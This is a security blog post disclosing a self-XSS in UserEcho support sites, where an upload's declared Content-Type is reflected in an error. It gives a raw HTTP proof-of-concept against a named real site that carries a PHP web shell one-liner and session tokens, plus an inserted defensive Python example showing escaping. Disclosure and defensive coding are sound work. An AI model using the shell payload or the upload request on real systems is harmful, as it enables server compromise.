Self XSS in error Content-Type on 20,000+ websites (en)

This continues my previous post: https://securityz.wordpress.com/2017/01/10/iframe_injection_20000/

A self-XSS vulnerability in the support sites hosted by userecho.com.

Choose the image upload, try to upload a shell instead, and you get the error: File type is not supported for image: application/octet-stream.

It is similar to XSS via the file name, except here the injection point is the Content-Type of the uploaded part, which is reflected in the error message.

PoC:

POST /upload/content/image/6/ HTTP/1.1
Host: support.gismeteo.ru
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Length: 288
Content-Type: multipart/form-data; boundary=---------------------------20589225426059
Cookie: uesessionid=hyfzrsuchqs7nckrbk1oeuijs1muyyct; csrftoken=B1zifrapMiiITZqW5WVtjD4Ye5Qn3Vv0v7iol6d75rcNLnKSMyLoFSgyuWXeVTky
Referer: https://yahoo.com/
Connection: close

-----------------------------20589225426059
Content-Disposition: form-data; name="content"; filename="shell3.php"
Content-Type: application/octet-stream

<? if($_GET['cmd']) { system($_GET['cmd']); } ?>
-----------------------------20589225426059--
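The weak pattern behind this bug, as an added example that is not from the original post and is not UserEcho's code: a small Python upload handler that reads the uploader-controlled Content-Type of the multipart part, shows the vulnerable reflection of that value beside the HTML-escaped form, and rejects anything outside an image allowlist without echoing malformed values at all. The function names, the allowlist, the regular expression and the sample multipart bodies are assumptions constructed for this example; the error string is the one quoted above.

```python
import html
import re
from email import message_from_bytes
from typing import Tuple

# Assumption for the example: the upload endpoint only ever wants these image types.
ALLOWED_IMAGE_TYPES = {"image/png", "image/jpeg", "image/gif"}

# type/subtype made only of token characters (RFC 7230 tchar); '<', '>', quotes and
# spaces are not tokens, so a media type carrying markup fails this check outright.
_MEDIA_TYPE_RE = re.compile(r"^[A-Za-z0-9!#$%&'*+.^_`|~-]+/[A-Za-z0-9!#$%&'*+.^_`|~-]+$")

# Constructed boundary for the sample bodies below (same shape as a browser would send).
BOUNDARY = "---------------------------20589225426059"


def make_body(filename: str, content_type: str, data: bytes) -> bytes:
    """Build a one-part multipart/form-data body (constructed test input, not a real upload)."""
    return (
        f"--{BOUNDARY}\r\n"
        f'Content-Disposition: form-data; name="content"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    ).encode() + data + f"\r\n--{BOUNDARY}--\r\n".encode()


def extract_part_content_type(body: bytes, boundary: str) -> str:
    """Return the raw Content-Type header of the first file part in a multipart body.

    This value is set by the client, not derived from the file bytes, so the server must
    treat it as untrusted input like any other request field.
    """
    raw = f"Content-Type: multipart/form-data; boundary={boundary}\r\n\r\n".encode() + body
    msg = message_from_bytes(raw)
    for part in msg.walk():
        if part.get_filename():
            return part.get("Content-Type", "")
    return ""


def error_message_vulnerable(content_type: str) -> str:
    """The pattern described in the post: the declared type is interpolated into HTML as-is."""
    return f"<p>File type is not supported for image: {content_type}</p>"


def error_message_safe(content_type: str) -> str:
    """Hardened form: escape the untrusted value before it reaches the page."""
    return f"<p>File type is not supported for image: {html.escape(content_type, quote=True)}</p>"


def handle_upload(body: bytes, boundary: str) -> Tuple[bool, str]:
    """Validate the declared type of the uploaded part.

    Returns (accepted, html_fragment_for_user). Malformed values are never reflected;
    well-formed but disallowed values are reflected only after escaping.
    """
    declared = extract_part_content_type(body, boundary)
    media_type = declared.split(";", 1)[0].strip().lower()
    if not _MEDIA_TYPE_RE.fullmatch(media_type):
        # Not a syntactically valid media type: report generically, log the raw value server-side.
        return False, "<p>File type is not supported for image.</p>"
    if media_type not in ALLOWED_IMAGE_TYPES:
        return False, error_message_safe(media_type)
    # A real handler should also sniff the file's magic bytes instead of trusting this header.
    return True, ""


if __name__ == "__main__":
    # Constructed sample: a non-image upload declared as application/octet-stream, as in the PoC.
    octet = make_body("not-an-image.txt", "application/octet-stream", b"plain text, not an image")
    print(handle_upload(octet, BOUNDARY))
    # Constructed sample: a declared type carrying markup, which must not reach the page unescaped.
    marked_up = make_body("not-an-image.txt", "image/<b>bold</b>", b"still not an image")
    print(error_message_vulnerable(extract_part_content_type(marked_up, BOUNDARY)))
    print(handle_upload(marked_up, BOUNDARY))
```

The allowlist check does most of the work here: once only known image types are accepted, the error path never needs to quote arbitrary client text, and escaping is the remaining safety net for the one case where a well-formed but unsupported type is shown back to the user.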

The vulnerability is present on more than 20,000 sites, including those on this list: http://userecho.com/clients/?lang=ru. Support does not consider it dangerous and has decided not to fix it.

Video: https://www.youtube.com/watch?v=gqt4TzUUw8Q

Subscribe to https://twitter.com/MaximYaremchuk for more articles)
